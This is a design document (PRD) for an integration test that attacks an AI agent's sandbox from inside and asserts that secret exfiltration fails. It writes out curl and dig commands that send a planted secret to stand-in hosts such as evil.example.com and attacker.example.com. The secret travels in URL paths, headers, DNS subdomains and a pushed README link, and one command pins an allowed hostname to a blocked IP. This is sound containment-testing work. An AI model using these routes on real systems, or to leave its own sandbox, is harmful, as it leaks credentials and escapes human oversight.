PRD 0022: End-to-end sandbox-escape integration test
- Status: Active
- Author: didericis
- Created: 2026-05-26
Summary
A new integration test, tests/integration/test_sandbox_escape.py,
that brings up a real bottle with a known allowlist + a known
in-bottle secret, then runs five attacks from inside the agent
container and asserts each one fails. The five categories are
the live cross-section of how the sandbox is supposed to be
load-bearing:
- Request to a non-allowlisted hostname
- Request to a non-allowlisted IP literal
- Secret exfiltration to an allowed dest via HTTP (URL path, query string, request body, request headers)
- Secret exfiltration to an allowed dest via crafted DNS (subdomain-encoded host)
- Secret exfiltration via a link inside a README pushed through git-gate
The suite is the backend-agnostic gate the smolmachines work
has to pass before that backend can be considered a viable
substitute for Docker. Today's Docker backend is the
backend-under-test; the suite runs against whatever
BOT_BOTTLE_BACKEND resolves to.
Problem
The sandbox today is a composition of layers (pipelock,
egress, git-gate, --internal network, supervise) each tested
in isolation but never as a whole. The supervise integration
test exercises the MCP plumbing; test_orphan_cleanup covers
the cleanup CLI; the per-sidecar integration tests bring up
one sidecar at a time. None of them ask the operator-relevant
question: can an in-bottle agent get a secret out?
That's the question every prospective backend has to answer before it can ship. Smolmachines (or any other VM-based backend) will reimplement the sidecar topology over a different runtime. Without a backend-agnostic test we'd be reading the layers' code by eye to confirm each new backend glues them correctly. The diff between "looks right" and "actually blocks exfil" is the whole point of the project.
Goals / Success Criteria
The test suite passes when every one of the five attacks fails with a clear permissions-error signal:
1. Hostname not in allowlist. Agent's curl https://evil.example.com/ returns non-200 (proxy rejection, connection error, or 403). The test asserts the exit code is non-zero AND the response body / stderr does not contain the upstream's actual response.
2. IP literal not in allowlist. Agent's curl https://198.51.100.1/ (RFC 5737 documentation range) is blocked. Additionally tests curl --resolve api.anthropic.com:443:198.51.100.1 https://api.anthropic.com/ to confirm the host-header trick (pinning an allowlisted name to a blocked IP) doesn't bypass the allowlist.
3. Secret in HTTP request to an allowed destination. A known SECRET env var is planted in the bottle. The agent tries four shapes against the allowlisted destination:
   1. Secret in URL path: GET /v1/<SECRET>
   2. Secret in query string: GET /v1/?leak=<SECRET>
   3. Secret in request body: POST /v1/messages with JSON containing the secret
   4. Secret in request headers: GET /v1/ with X-Custom: <SECRET>

   The test asserts pipelock's DLP body scanner rejects (3) and surfaces what (1)/(2)/(4) actually do; they may currently pass through (see Resolved questions).
4. Secret-bearing DNS subdomain to allowed dest's parent. Agent runs curl https://<SECRET>.api.anthropic.com/. The hostname is constructed to look "under" an allowlisted apex, but the SECRET payload leaks via the DNS query to whichever resolver pipelock/egress consults. The test asserts pipelock rejects the host BEFORE issuing the DNS query (host-allowlist matches the exact apex, not subdomains).
5. Secret-bearing link in a PR README. Agent edits README.md to include [click](https://attacker.example.com/?leak=<SECRET>), commits, and git pushes through git-gate. The pre-receive hook's gitleaks scan must reject the push because the secret matches one of gitleaks's bundled rules.
The "pass" condition is uniform across all five: the attack's exit code is non-zero AND the secret never reaches a network destination outside the bottle.
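The exact-apex rule that attack 4 relies on can be illustrated with a minimal sketch. This is not pipelock's implementation; host_allowed and ALLOWLIST are hypothetical names, and the only assumption is that the allowlist is compared against the full hostname with no suffix matching.

```python
# Hypothetical allowlist mirroring a single allowlisted egress route.
ALLOWLIST = frozenset({"api.anthropic.com"})


def host_allowed(host: str, allowlist: frozenset = ALLOWLIST) -> bool:
    """Exact-match check: a subdomain of an allowed host is NOT allowed."""
    # Normalize case and a trailing root dot so "API.Anthropic.com." still matches.
    normalized = host.rstrip(".").lower()
    return normalized in allowlist
```

Because the decision is made on the hostname string alone, a rejection needs no DNS lookup, which is the property the crafted-subdomain attack depends on.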
Non-goals
- Detecting exfiltration via side channels — timing, cache state, error-message-length oracles. v1 covers the direct paths only.
- Asserting on specific error messages or HTTP status codes. Each layer (pipelock / egress / git-gate / gitleaks) has its own rejection vocabulary. The test asserts on the OUTCOME (attack failed, no upstream traffic) not the WORDING.
- Testing the Docker backend's specific sandbox implementation in detail. That's what the per-sidecar integration tests already do. This suite is composite: did the whole bottle prevent leakage, regardless of which layer caught it?
- A network-tap that confirms zero packets reached attacker.example.com. Out of scope for v1; we trust the pipelock/egress error reporting and verify exit codes. If we want zero-packets confirmation later, a host-side iptables / pcap layer can extend the suite.
- Running against a backend that doesn't exist yet. The suite is written against the abstract BottleBackend API via the existing get_bottle_backend() selector; future smolmachines work flips BOT_BOTTLE_BACKEND=smolmachines and reruns. No smolmachines-specific code here.
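As a rough illustration of env-driven backend selection, the sketch below resolves a backend name from BOT_BOTTLE_BACKEND and exits loudly on an unknown value. It is not the project's get_bottle_backend(); select_backend, _BACKENDS, the placeholder return value, and the "docker" default are all assumptions made for the example.

```python
import os

# Hypothetical registry; a real selector would map names to backend classes.
_BACKENDS = {"docker": lambda: "docker-backend"}


def select_backend(env=None):
    """Return a backend for BOT_BOTTLE_BACKEND, or exit loudly if unknown."""
    env = os.environ if env is None else env
    # Defaulting to "docker" when the variable is unset is an assumption.
    name = env.get("BOT_BOTTLE_BACKEND", "docker")
    factory = _BACKENDS.get(name)
    if factory is None:
        known = ", ".join(sorted(_BACKENDS))
        raise SystemExit(
            f"unknown BOT_BOTTLE_BACKEND {name!r}; known backends: {known}"
        )
    return factory()
```

Under this shape, rerunning the suite against a new backend only requires registering it and changing the environment variable; the test file itself stays untouched.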
Scope
In scope
- A new tests/integration/test_sandbox_escape.py with one TestSandboxEscape class and one test_<n>_<category> method per attack.
- A test fixture that:
  - Builds a manifest with one bottle, one agent
  - The bottle declares: a few allowlisted egress routes (api.anthropic.com, etc.), a git-gate upstream pointing at a throwaway repo, supervise off (not under test)
  - Plants three known secret env vars (matching three gitleaks rules: anthropic-api-key, AWS, generic high-entropy) so test 5 parameterizes over shapes.
- A setUpClass preflight that verifies curl, git, dig exist in the agent container; raises unittest.SkipTest listing missing tools if any are absent (catches future backends with thinner images).
- A _run_in_agent(script) helper that wraps bottle.exec(script) and returns an ExecResult.
- Assertions per category that read the existing ExecResult.returncode / .stdout / .stderr.
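The preflight could look roughly like the sketch below. The ExecResult dataclass here is a hypothetical stand-in for the project's type, exec_fn stands in for bottle.exec, and probing each tool separately with the POSIX command -v builtin is a choice made for this example so the skip message can name exactly what is missing.

```python
import unittest
from dataclasses import dataclass


@dataclass
class ExecResult:
    """Hypothetical stand-in for the real ExecResult."""
    returncode: int
    stdout: str = ""
    stderr: str = ""


REQUIRED_TOOLS = ("curl", "git", "dig")


def missing_tools(exec_fn, tools=REQUIRED_TOOLS):
    """Return the tools that the agent container cannot find on PATH."""
    missing = []
    for tool in tools:
        # One probe per tool so the caller learns which ones are absent.
        result = exec_fn(f"command -v {tool} >/dev/null 2>&1")
        if result.returncode != 0:
            missing.append(tool)
    return missing


def preflight(exec_fn):
    """Raise unittest.SkipTest listing any missing tools."""
    missing = missing_tools(exec_fn)
    if missing:
        raise unittest.SkipTest("agent image is missing: " + ", ".join(missing))
```

Called from setUpClass after bringup, a SkipTest raised here skips the whole class once instead of producing one command-not-found failure per attack.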
Out of scope
- The per-attack remediation engines. If a category's assertion fails, the test is reporting a real gap — the remediation is its own PRD.
- Running the suite as part of every PR's CI. v1 lives in tests/integration/ and runs locally on demand; CI integration is a follow-up that has to weigh wall-clock cost (bringup is ~10s per test class).
Proposed design
Single fixture per attack class
setUpClass brings the bottle up once; tearDownClass
brings it down. Per-test setup is cheap (resetting any
secret-content-storage). The five attacks share the same
bottle so the suite is ~15s wall-clock total instead of
~50s with per-test bringup.
Bottle manifest
# tests/integration/fixtures/sandbox-escape/agents/sandbox-tester.md
---
bottle: dev
---
(no prompt; exec_agent isn't called)

# tests/integration/fixtures/sandbox-escape/bottles/dev.md
---
env:
  - name: TEST_SECRET
    value: sk-ant-api03-fake-shape-but-realistic-length-for-gitleaks
egress:
  routes:
    - host: api.anthropic.com
git:
  remotes:
    127.0.0.1:
      Name: throwaway
      Upstream: ssh://git@127.0.0.1:22/throwaway.git
      IdentityFile: ~/.ssh/cb-test-key  # fixture key
---
TEST_SECRET is shaped like an Anthropic API key so
gitleaks's anthropic-api-key rule fires on the README. We
don't ship a real key; the prefix-pattern + length match the
rule's regex.
The git upstream URL is unreachable on purpose — we want git-gate's pre-receive hook to reject the push BEFORE it tries to forward to a real upstream. The hook's gitleaks scan happens first.
Per-attack scaffolding
Each test calls bottle.exec(script) (the existing
Bottle.exec from bot_bottle.backend.Bottle) and
asserts on the returncode + stdout + stderr.
The agent container has curl, git, dig, etc. pre-installed
(already true today for the Docker bottle image).
Attack-1: hostname not in allowlist
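import re  # at module top

def test_1_hostname_not_in_allowlist(self):
    # The trailing echo makes the script itself exit 0, so curl's
    # status is read from the "exit=<n>" marker, not result.returncode.
    result = self.bottle.exec(
        'curl --silent --max-time 5 --fail '
        'https://evil.example.com/ ; echo "exit=$?"'
    )
    # The attack's stdout should not contain anything from
    # evil.example.com; pipelock should have stopped it.
    self.assertNotIn("evil.example.com", result.stdout)
    # Extract the curl exit code and assert it is non-zero.
    match = re.search(r"exit=(\d+)", result.stdout)
    self.assertIsNotNone(match, "missing exit marker in stdout")
    self.assertNotEqual(0, int(match.group(1)))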
Attack-2: IP literal not in allowlist
def test_2_ip_not_in_allowlist(self):
    # Direct IP
    result = self.bottle.exec(
        'curl --silent --max-time 5 --fail https://198.51.100.1/'
    )
    self.assertNotEqual(0, result.returncode)
    # Host-header spoof: pin the allowlisted name to the blocked IP
    result = self.bottle.exec(
        'curl --silent --max-time 5 --fail '
        '--resolve api.anthropic.com:443:198.51.100.1 '
        'https://api.anthropic.com/'
    )
    self.assertNotEqual(0, result.returncode)
Attack-3: HTTP exfil shapes
Loop over four shapes (path / query / body / header), assert each one is blocked by either pipelock's DLP or egress's path-filter. Headers in particular may not be DLP-scanned today; surface that gap clearly if so.
SHAPES = [
    ("path", 'curl -sf "https://api.anthropic.com/v1/$TEST_SECRET"'),
    ("query", 'curl -sf "https://api.anthropic.com/v1/?leak=$TEST_SECRET"'),
    ("body", 'curl -sf -X POST "https://api.anthropic.com/v1/messages" '
             '-H "Content-Type: application/json" '
             '-d "{\\"secret\\": \\"$TEST_SECRET\\"}"'),
    ("header", 'curl -sf "https://api.anthropic.com/v1/" '
               '-H "X-Custom: $TEST_SECRET"'),
]

def test_3_http_exfil_blocked(self):
    for name, cmd in SHAPES:
        with self.subTest(shape=name):
            result = self.bottle.exec(cmd)
            self.assertNotEqual(
                0, result.returncode,
                f"{name} exfil should have been blocked",
            )
Attack-4: DNS exfil — both crafted subdomain AND direct query
Two sub-assertions cover the two ways DNS can leak.
def test_4_dns_exfil_blocked(self):
    # 4a: crafted subdomain that pipelock would resolve.
    # Pipelock's exact-match allowlist rejects the host
    # before issuing the DNS query.
    result = self.bottle.exec(
        'curl --silent --max-time 5 --fail '
        '"https://$TEST_SECRET.api.anthropic.com/"'
    )
    self.assertNotEqual(0, result.returncode)
    # 4b: direct DNS query bypassing pipelock entirely.
    # The agent's --internal network has no default
    # gateway; even with an explicit resolver like 8.8.8.8
    # the query has nowhere to go.
    result = self.bottle.exec(
        'dig +time=3 +tries=1 @8.8.8.8 '
        '"$TEST_SECRET.example.com" || echo "dig exit=$?"'
    )
    # No successful answer.
    self.assertNotIn("ANSWER SECTION", result.stdout)
Attack-5: secret in README push (multi-shape, with ordering check)
Parameterized over three secret shapes so a renamed gitleaks rule doesn't silently let one shape through.
SECRET_SHAPES = [
    ("anthropic", "$TEST_SECRET_ANTHROPIC"),
    ("aws", "$TEST_SECRET_AWS"),
    ("generic", "$TEST_SECRET_GENERIC"),
]

def test_5_readme_push_blocked(self):
    for name, env_ref in SECRET_SHAPES:
        with self.subTest(secret=name):
            result = self.bottle.exec(
                'cd /tmp && rm -rf test-repo && '
                'git init test-repo && cd test-repo && '
                'git config user.email "test@example.com" && '
                'git config user.name "test" && '
                f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && '
                'git add . && git commit -m "leak" && '
                'git remote add origin '
                'git://bot-bottle-git-gate-<slug>/throwaway.git && '
                'git push origin master'
            )
            self.assertNotEqual(0, result.returncode)
            combined = (result.stderr + result.stdout).lower()
            # gitleaks ran and rejected.
            self.assertIn("gitleaks", combined)
            # AND: rejection BEFORE the unreachable upstream
            # was contacted; network-phase errors would
            # mean gitleaks ran late or not at all.
            for upstream_phrase in (
                "could not resolve",
                "connection refused",
                "network is unreachable",
                "upstream",
            ):
                self.assertNotIn(
                    upstream_phrase, combined,
                    f"unexpected upstream-phase phrase for {name!r}: "
                    f"gitleaks should reject BEFORE git-gate "
                    f"attempts an upstream push",
                )
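The two output checks in the test above (gitleaks fired, no network-phase phrases) can also be factored into a pure function, which makes the ordering logic testable without a bottle. This is a sketch only; classify_push_output and UPSTREAM_PHASE_PHRASES are hypothetical names, and the phrase list is copied from the test.

```python
# Phrases that would indicate the push got as far as the upstream attempt.
UPSTREAM_PHASE_PHRASES = (
    "could not resolve",
    "connection refused",
    "network is unreachable",
    "upstream",
)


def classify_push_output(stdout: str, stderr: str) -> dict:
    """Summarize a rejected push: did gitleaks fire, and did any
    upstream-phase phrase appear in the combined output?"""
    combined = (stderr + stdout).lower()
    return {
        "gitleaks_fired": "gitleaks" in combined,
        "upstream_phrases": [
            phrase for phrase in UPSTREAM_PHASE_PHRASES if phrase in combined
        ],
    }
```

A passing iteration would then be one where gitleaks_fired is true and upstream_phrases is empty; any other combination points at either a missed secret or a scan that ran too late.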
The <slug> is templated via the bottle's known identity at
fixture-time. Each subTest independently:
- Confirms the rejection happened (returncode != 0)
- Confirms gitleaks fired ("gitleaks" in output)
- Confirms gitleaks fired BEFORE the upstream attempt (no network-phase phrases in output)
Implementation chunks
Sized small.
1. Fixture + scaffolding. Files under tests/integration/fixtures/sandbox-escape/, the TestSandboxEscape class with setUpClass / tearDownClass, the three-secret env-var fixture (anthropic / AWS / generic shapes), and the setUpClass preflight that checks for curl, git, dig in the agent and SkipTests with the missing list. No attack tests yet.
2. Attack 1 + 2 (hostname + IP). Curl exit-code assertions. Also covers the host-header spoof via curl --resolve.
3. Attack 3 (HTTP exfil shapes). Parameterized over the four shapes (path, query, body, header) via subTest. This chunk is authoritative: if any shape leaks today, the chunk expands to include the remediation PRD work for that shape before merging. May fan out into multiple sub-PRs (one per leaking shape) coordinated as a chunk-3 epic.
4. Attack 4 (DNS exfil). Two sub-assertions: crafted-subdomain-via-pipelock + direct dig @8.8.8.8 from the agent's --internal network.
5. Attack 5 (README push via git-gate). Hardest because of the multi-secret-shape parameterization + git-gate-must-be-up requirement + the gitleaks-ordering assertions. The "throwaway" upstream URL is intentionally unreachable.
6. CI integration (best-effort). Add a Gitea Actions job that runs the suite against the Docker backend. Marked continue-on-error: true so the workflow doesn't fail if docker-in-docker constraints prevent compose-up. If the runner shape evolves later (privileged Docker socket access) the suite slots in cleanly.
Resolved questions
1. Pipelock DLP coverage for non-body shapes. Resolved: authoritative. Every HTTP-exfil shape (path / query / body / header) MUST block for the suite to pass. If a shape leaks today, it's a real sandbox gap and the remediation lands BEFORE this test merges, not after. The project's purpose is sandbox integrity; shipping a test that documents "we knowingly leak headers" is worse than not shipping the test. May expand the delivery into "this test PRD + N remediation PRDs" depending on what attack 3 surfaces.
2. DNS exfil via the agent's direct DNS resolver. Resolved: add the assertion to test 4. The --internal network has no default gateway, so a direct dig @8.8.8.8 <SECRET>.example.com from the agent should fail. Test 4 grows a second sub-assertion alongside the crafted-subdomain-via-pipelock check.
3. Realistic fake secret. Resolved: multiple shapes, parameterized. The README attack (test 5) loops over a tuple of secret shapes (anthropic-api-key, AWS key (AKIA...), and a generic high-entropy string), running the push-attempt N times. Each iteration is a subTest. Catches the case where one gitleaks rule lapses but another still fires; also makes the test resilient to rule renames. The fixture bottle's env carries TEST_SECRET_ANTHROPIC / TEST_SECRET_AWS / TEST_SECRET_GENERIC rather than one combined TEST_SECRET.
4. Reachability of throwaway git upstream + gitleaks ordering. Resolved: add ordering assertions to test 5. The pre-receive hook MUST reject the push before git-gate ever attempts to forward to the (unreachable) upstream. Test 5 asserts:
   - "gitleaks" appears in the rejection output (gitleaks fired)
   - The rejection output does NOT contain phrases like "could not resolve", "connection refused", "network is unreachable", or "upstream"; those would mean gitleaks let the push through and the failure happened later in the chain.
5. CI vs. local-only. Resolved: attempt CI; accept local-only fallback if docker-in-docker blocks it. Add a Gitea Actions job that runs the suite against the Docker backend on a runner with Docker socket access. If compose-up fails because of DiD constraints, the job is marked continue-on-error: true and the suite stays local-only until we have a runner shape that can host it.
6. Backend-agnostic invocation when backend missing. Resolved: die (current behavior). get_bottle_backend() already dies with a clear message naming the unknown backend; the test surfaces that as a hard error rather than a skip. Forces the developer to set BOT_BOTTLE_BACKEND to a real implementation; surprise-skips on smolmachines branches that forgot to set the env var are worse than a loud failure.
7. Test environment requirements: enforce via preflight. Resolved: preflight check in setUpClass. After bringing the bottle up, run which curl && which git && which dig inside the agent container; if any tool is missing, raise unittest.SkipTest with the missing list. Catches a future backend that ships a thinner base image without producing five confusing command-not-found failures down the suite.
References
- PRD 0017 — egress-proxy + path-allowlist + auth injection (the layer test 3 + 4 stresses)
- PRD 0014 / 0015 — pipelock / egress remediation flows (the surfaces the attacks would propose changes to if denied via the supervise route)
- PRD 0008 — git-gate + pre-receive gitleaks (the layer test 5 stresses)
- PRD 0018 — compose-per-instance (the topology the test brings up)
- tests/integration/test_supervise_sidecar.py: the existing single-sidecar integration test pattern this suite generalizes